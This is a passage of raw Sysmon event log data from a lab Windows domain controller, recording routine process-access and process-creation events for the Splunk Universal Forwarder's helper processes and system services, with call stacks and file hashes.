Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:47.222{59A5CD1D-9093-6005-1F01-00000000A301}4928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.862{59A5CD1D-9094-6005-2101-00000000A301}50324812C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.721{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9094-6005-2101-00000000A301}5032C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.721{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:48.721{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.721{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:48.721{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.721{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:48.721{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.721{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:48.721{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.721{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.721{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9094-6005-2101-00000000A301}5032C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.721{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9094-6005-2101-00000000A301}5032C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.722{59A5CD1D-9094-6005-2101-00000000A301}5032C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.190{59A5CD1D-9094-6005-2001-00000000A301}36762120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.050{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9094-6005-2001-00000000A301}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:48.050{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.050{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:48.050{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.050{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:48.050{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.050{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:48.050{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.050{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:48.050{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Wind